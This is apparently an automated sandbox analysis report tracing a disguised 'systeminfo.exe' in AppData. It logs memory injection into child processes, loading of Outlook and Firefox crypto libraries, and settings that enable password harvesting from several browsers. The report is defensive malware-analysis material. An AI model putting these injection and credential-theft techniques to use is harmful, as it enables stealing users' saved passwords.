System	Get Time	type = Ticks, time = 136984	1	Fn

Thread 0x2ac

(Host: 3, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = Ticks, time = 132912	3	Fn
System	Get Time	type = Ticks, time = 132990	1	Fn
System	Get Time	type = Ticks, time = 133412	1	Fn

Process #9: systeminfo.exe

(Host: 48, Network: 0)

Information	Value
ID	#9
File Name	c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp"
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:08, Reason: Child Process
Unmonitor	End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration	00:01:15

OS Process Information

Information	Value
PID	0x674
Parent PID	0x81c (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 9E4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
imm32.dll	0x00020000	0x0003dfff	Memory Mapped File	Readable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000000d0000	0x000d0000	0x0010ffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00110000	0x00176fff	Memory Mapped File	Readable	Region Actions
private_0x00000000002d0000	0x002d0000	0x003cffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000400000	0x00400000	0x00418fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000590000	0x00590000	0x0060ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000780000	0x00780000	0x0087ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000880000	0x00880000	0x009fffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000a00000	0x00a00000	0x00b87fff	Pagefile Backed Memory	Readable	Region Actions
3292.exe	0x00be0000	0x00bfefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000c00000	0x00c00000	0x00d80fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000d90000	0x00d90000	0x0218ffff	Pagefile Backed Memory	Readable	Region Actions
wow64cpu.dll	0x746e0000	0x746e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x746f0000	0x7474bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74750000	0x7478efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74dc0000	0x74dcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74dd0000	0x74e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x74e30000	0x74e8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74e90000	0x74ea8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x750d0000	0x75126fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75130000	0x751bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75250000	0x75295fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x752a0000	0x7534bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75450000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x755b0000	0x7564cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x756e0000	0x7577ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75780000	0x75789fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75790000	0x7588ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759f0000	0x75afffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75b00000	0x75bcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75c50000	0x76899fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76d80000	0x76e6ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076e70000	0x76e70000	0x76f69fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000076f70000	0x76f70000	0x7708efff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77270000	0x773effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Count	Logfile
Modify Memory	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe	0x884	address = 0x400000, size = 102400	1	Fn Data
Modify Memory	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe	0x884	address = 0x7efde008, size = 4	1	Fn Data
Modify Memory	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe	0x884	address = 0x7efdf010, size = 4	1	Fn Data
Modify Control Flow	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe	0x884	os_tid = 0x9e4, address = 0x0	1	Fn

Threads

Thread 0x9e4

(Host: 48, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-11-28 18:18:50 (UTC)	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75a04f2b	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x75a0359f	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75a01252	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75a04208	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75a04d28	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x75a8410b	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x75a84195	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x75a0d31f	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x75a1ee7e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x772b441c	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x772dc50e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x772dc381	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x75a1f088	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x772c05d7	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x772dca24	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77290b8c	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x7734fde8	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x772e1e1d	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x75a84761	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x75a7cd11	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x75a8424f	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x75a846b1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x75a96676	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x75a84751	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x75a965f1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x75a847c1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x75a847e1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x75a847f1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x75a1eee0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x756e0000	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x75450000	1	Fn
Module	Load	module_name = shell32.dll, base_address = 0x75c50000	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook, value_name = DLLPathEx, data = 67	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook, value_name = MSIApplicationLCID, data = 77	1	Fn
Module	Load	module_name = C:\Program Files\Microsoft Office\Root\Office16\OLMAPI32.DLL, base_address = 0x0	1	Fn
Module	Get Handle	module_name = mscoree.dll	1	Fn

Process #10: systeminfo.exe

(Host: 792, Network: 0)

Information	Value
ID	#10
File Name	c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp"
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:08, Reason: Child Process
Unmonitor	End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration	00:01:15

OS Process Information

Information	Value
PID	0xa98
Parent PID	0x81c (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 964 0x 724

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000090000	0x00090000	0x00093fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000a0000	0x000a0000	0x000a1fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x000b0000	0x00116fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000120000	0x00120000	0x00120fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000130000	0x00130000	0x00131fff	Pagefile Backed Memory	Readable	Region Actions
rsaenh.dll	0x00140000	0x0017bfff	Memory Mapped File	Readable	Region Actions
tzres.dll	0x00140000	0x00140fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000140000	0x00140000	0x0014ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000140000	0x00140000	0x00148fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000150000	0x00150000	0x00156fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000160000	0x00160000	0x00161fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000170000	0x00170000	0x00178fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000190000	0x00190000	0x0028ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000290000	0x00290000	0x0038ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003d0000	0x003d0000	0x003dffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000400000	0x00400000	0x0045afff	Private Memory	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000460000	0x00460000	0x005e7fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000630000	0x00630000	0x006affff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000006b0000	0x006b0000	0x00830fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000880000	0x00880000	0x0097ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000009b0000	0x009b0000	0x009effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000a10000	0x00a10000	0x00b0ffff	Private Memory	Readable, Writable	Region Actions
3292.exe	0x00be0000	0x00bfefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000c00000	0x00c00000	0x01ffffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x02000000	0x022cefff	Memory Mapped File	Readable	Region Actions
private_0x00000000022d0000	0x022d0000	0x023d0fff	Private Memory	Readable, Writable	Region Actions
nss3.dll	0x022d0000	0x02481fff	Memory Mapped File	Readable	Region Actions
nss3.dll	0x022d0000	0x02481fff	Memory Mapped File	Readable	Region Actions
private_0x00000000022d0000	0x022d0000	0x0240ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000022d0000	0x022d0000	0x023cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000023d0000	0x023d0000	0x0240ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002410000	0x02410000	0x0251ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002410000	0x02410000	0x0250ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002510000	0x02510000	0x0251ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002520000	0x02520000	0x0271ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002600000	0x02600000	0x026fffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002700000	0x02700000	0x02af2fff	Pagefile Backed Memory	Readable	Region Actions
freebl3.dll	0x73c90000	0x73cdefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
freebl3.dll	0x73ca0000	0x73ceefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
softokn3.dll	0x73ce0000	0x73d06fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nssdbm3.dll	0x73cf0000	0x73d06fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
softokn3.dll	0x73d10000	0x73d36fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nssdbm3.dll	0x73d20000	0x73d36fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcp100.dll	0x73d40000	0x73da8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mozglue.dll	0x73db0000	0x73dd1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr100.dll	0x73de0000	0x73e9dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wsock32.dll	0x73ea0000	0x73ea6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nss3.dll	0x73eb0000	0x74064fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
vaultcli.dll	0x740e0000	0x740ebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x74130000	0x74143fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pstorec.dll	0x74150000	0x7415cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x74160000	0x74168fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x742f0000	0x7448dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x746e0000	0x746e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x746f0000	0x7474bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74750000	0x7478efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winmm.dll	0x74860000	0x74891fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74b30000	0x74b6afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x74b70000	0x74b85fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74dc0000	0x74dcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74dd0000	0x74e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x74e30000	0x74e8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74e90000	0x74ea8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x74eb0000	0x74eb4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x74ec0000	0x750bafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x750c0000	0x750cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x750d0000	0x75126fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75130000	0x751bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75250000	0x75295fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x752a0000	0x7534bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x75350000	0x75444fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75450000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x755b0000	0x7564cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x756e0000	0x7577ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75780000	0x75789fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75790000	0x7588ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x75890000	0x758c4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x758d0000	0x759ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759f0000	0x75afffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75b00000	0x75bcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comdlg32.dll	0x75bd0000	0x75c4afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75c50000	0x76899fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x76b60000	0x76beefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76c40000	0x76d75fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76d80000	0x76e6ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076e70000	0x76e70000	0x76f69fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000076f70000	0x76f70000	0x7708efff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x77240000	0x77245fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77270000	0x773effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Count	Logfile
Modify Memory	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe	0x8b4	address = 0x400000, size = 372736	1	Fn Data
Modify Memory	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe	0x8b4	address = 0x7efde008, size = 4	1	Fn Data
Modify Memory	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe	0x8b4	address = 0x7efdf010, size = 4	1	Fn Data
Modify Control Flow	#7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe	0x8b4	os_tid = 0x964, address = 0x0	1	Fn

Threads

Thread 0x964

(Host: 276, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = private_0x0000000000400000, base_address = 0x400000	2	Fn
Module	Load	module_name = comctl32.dll, base_address = 0x742f0000	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, function = InitCommonControlsEx, address_out = 0x743109ce	1	Fn
Module	Load	module_name = shell32.dll, base_address = 0x75c50000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x75c70468	1	Fn
Module	Get Handle	module_name = private_0x0000000000400000, base_address = 0x400000	2	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo_lng.ini, type = file_attributes	1	Fn
Module	Get Handle	module_name = private_0x0000000000400000, base_address = 0x400000	18	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = ShowGridLines, default_value = 0	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = ShowInfoTip, default_value = 1	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = ShowTimeInGMT, default_value = 0	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = LoadPasswordsIE, default_value = 1	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = LoadPasswordsFirefox, default_value = 1	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = LoadPasswordsChrome, default_value = 1	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = LoadPasswordsOpera, default_value = 1	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = LoadPasswordsSafari, default_value = 1	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1	1	Fn
Ini	Read	file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg, section_name = General, key_name = LoadPasswordsYandex, default_value = 1	1	Fn
